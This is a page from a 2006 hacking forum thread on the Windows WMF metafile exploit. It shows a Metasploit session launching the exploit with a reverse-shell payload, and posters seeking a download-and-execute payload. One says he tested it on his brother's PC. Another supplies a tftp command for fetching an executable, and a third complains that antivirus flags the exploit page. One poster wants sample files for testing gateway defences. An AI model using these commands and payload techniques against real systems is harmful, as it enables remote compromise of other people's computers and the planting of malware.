Forums: Wmf Exploit With Download & Exec Shellcode - Forums

Jump to content

  • (5 Pages)
  • +
  • 1
  • 2
  • 3
  • 4
  • Last »
  • You cannot start a new topic
  • You cannot reply to this topic

Wmf Exploit With Download & Exec Shellcode

#16 User is offline   shatter 

  • Private
  • Icon
  • Group: Members
  • Posts: 10
  • Joined: 09-October 05

Posted 03 January 2006 - 07:36 PM

When I do this between two machines on my LAN it seems to hang at [*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
-------------------------------------------------
msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.102:8080/
[*] HTTP Client connected from 192.168.1.100:1323, redirecting...
[*] HTTP Client connected from 192.168.1.100:1324, sending 1980 bytes of payload...
[*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
-------------------------------------------------
Am I doing something wrong or is there something else I need to to?

This post has been edited by shatter: 03 January 2006 - 07:48 PM

0

#17 User is offline   y123 

  • Private
  • Icon
  • Group: Members
  • Posts: 1
  • Joined: 13-December 05

Posted 04 January 2006 - 12:30 AM

View Postshatter, on Jan 4 2006, 04:36 AM, said:

When I do this between two machines on my LAN it seems to hang at [*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
-------------------------------------------------
msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.102:8080/
[*] HTTP Client connected from 192.168.1.100:1323, redirecting...
[*] HTTP Client connected from 192.168.1.100:1324, sending 1980 bytes of payload...
[*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
-------------------------------------------------
Am I doing something wrong or is there something else I need to to?


I don't think you are doing some thing wrong. I tried it successfuly yesterday. but today I got the same thing than you. IT SEEMS TO ME THAT IT HAS BEEN PATCHED.
0

#18 User is offline   seminarian 

  • Private
  • Icon
  • Group: Members
  • Posts: 10
  • Joined: 28-November 05

Posted 04 January 2006 - 01:47 AM

View PostVUGO, on Jan 3 2006, 07:32 PM, said:

Hi folks,
maybe it help us...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Used with permission by san[at]xfocus.org:
------------------------------------------

....

Is this some stuff to put in a file to make a vuln pic?

anyone could explain it a bit easier?

thanks in advance!
0

#19 User is offline   mrgoolie 

  • Private
  • Icon
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 04 January 2006 - 02:48 AM

after searching and searching i found the most things myselve. but i cant find anything about the payloads.
what is that? is that some kind of program? how can i make my own payload that download something from
the web?

This post has been edited by mrgoolie: 04 January 2006 - 02:58 AM

0

#20 User is offline   seminarian 

  • Private
  • Icon
  • Group: Members
  • Posts: 10
  • Joined: 28-November 05

Posted 04 January 2006 - 03:17 AM

View Postmrgoolie, on Jan 4 2006, 11:48 AM, said:

after searching and searching i found the most things myselve. but i cant find anything about the payloads.
what is that? is that some kind of program? how can i make my own payload that download something from
the web?

thanks for helping a bit mrgoolie :rolleyes:
0

#21 User is offline   mrgoolie 

  • Private
  • Icon
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Post icon  Posted 04 January 2006 - 04:40 AM

after hours searching for more information i understand the wmf exploit.
but still some little questions, the payload win32_adduser doenst work here,
i always get an error.
and has anybody already found a way to make a payload that uploads
and executes a file? i tried with win32_exec but i cant find a way to give
parameters to the ftp.exe command, and i think that firefox is also patched,
because i cant find a working way to exploit....


I tested it on my brothers pc with the win32_exec command, and then the cmd:
calc.exe and it works, so when i go to that site, it opens calc.exe.
now i just want to find a way so it downloads a file from the internet... and opens it

This post has been edited by mrgoolie: 04 January 2006 - 04:48 AM

0

#22 User is offline   w00zy 

  • Sergeant
  • Icon
  • Group: Members
  • Posts: 246
  • Joined: 03-August 05

Posted 04 January 2006 - 04:48 AM

View Postmrgoolie, on Jan 4 2006, 01:40 PM, said:

after hours searching for more information i understand the wmf exploit.
but still some little questions, the payload win32_adduser doenst work here,
i always get an error.
and has anybody already found a way to make a payload that uploads
and executes a file? i tried with win32_exec but i cant find a way to give
parameters to the ftp.exe command, and i think that firefox is also patched,
because i cant find a working way to exploit....


Instead of using ftp.exe you could use tftp.exe, it doesn't have an own shell, just type tftp.exe /? for more information!
I can't uninstall it, there seems to be some kind of "Uninstall Shield".
0

#23 User is offline   mrgoolie 

  • Private
  • Icon
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 04 January 2006 - 04:56 AM

View Postw00zy, on Jan 4 2006, 01:48 PM, said:

Instead of using ftp.exe you could use tftp.exe, it doesn't have an own shell, just type tftp.exe /? for more information!


and how do you give the user and pass parameter?
tftp user:pass@ftp.server.be GET file.exe -> doenst work
0

#24 User is offline   EviL 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 175
  • Joined: 11-October 03

Posted 04 January 2006 - 05:21 AM

tftp -i ip get file.exe
0

#25 User is offline   mrgoolie 

  • Private
  • Icon
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 04 January 2006 - 07:05 AM

View PostEviL, on Jan 4 2006, 02:21 PM, said:

tftp -i ip get file.exe


but when you go to a website wich uses the exploit, my nod32 directly give a warning message. damn :angry:
0

#26 User is offline   Red Section 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 80
  • Joined: 13-October 04

Posted 04 January 2006 - 07:55 AM

Hi guys and gals,

Long time no post :) I need to see if I can get hold of the "WMF maker" app, as I need to test my GW security to make sure it is stripping out the WMF code.

So any one know a site were I can grab the app?

Thanks in advanced
0

#27 User is offline   mrgoolie 

  • Private
  • Icon
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 04 January 2006 - 08:20 AM

View PostRed Section, on Jan 4 2006, 04:55 PM, said:

Hi guys and gals,

Long time no post :) I need to see if I can get hold of the "WMF maker" app, as I need to test my GW security to make sure it is stripping out the WMF code.

So any one know a site were I can grab the app?

Thanks in advanced

www.metasploit.com
download it there
the exploit is in the framework
0

#28 User is offline   EviL 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 175
  • Joined: 11-October 03

Posted 04 January 2006 - 10:19 AM

View Postmrgoolie, on Jan 4 2006, 05:20 PM, said:

View PostRed Section, on Jan 4 2006, 04:55 PM, said:

Hi guys and gals,

Long time no post :) I need to see if I can get hold of the "WMF maker" app, as I need to test my GW security to make sure it is stripping out the WMF code.

So any one know a site were I can grab the app?

Thanks in advanced

www.metasploit.com
download it there
the exploit is in the framework



maybe he means an apps for WMF creation and not the exploit or am i wrong?....I've saw that tool on another site, if u really need that tool i can post here...
0

#29 User is offline   Red Section 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 80
  • Joined: 13-October 04

Posted 04 January 2006 - 11:31 AM

Yep that is what I mean. I need to make the WMF files to pass through a number of different levels of GW security devices, so although I could do it via Metasploit it would be easier if I had the file :) If you could post it or the URL it would be great.
0

#30 User is offline   EviL 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 175
  • Joined: 11-October 03

Posted 04 January 2006 - 11:44 AM

View PostRed Section, on Jan 4 2006, 08:31 PM, said:

Yep that is what I mean. I need to make the WMF files to pass through a number of different levels of GW security devices, so although I could do it via Metasploit it would be easier if I had the file :) If you could post it or the URL it would be great.



sure but seems that i can't attach files....if u want i'll send it by email :) let me know
0

  • (5 Pages)
  • +
  • 1
  • 2
  • 3
  • 4
  • Last »
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting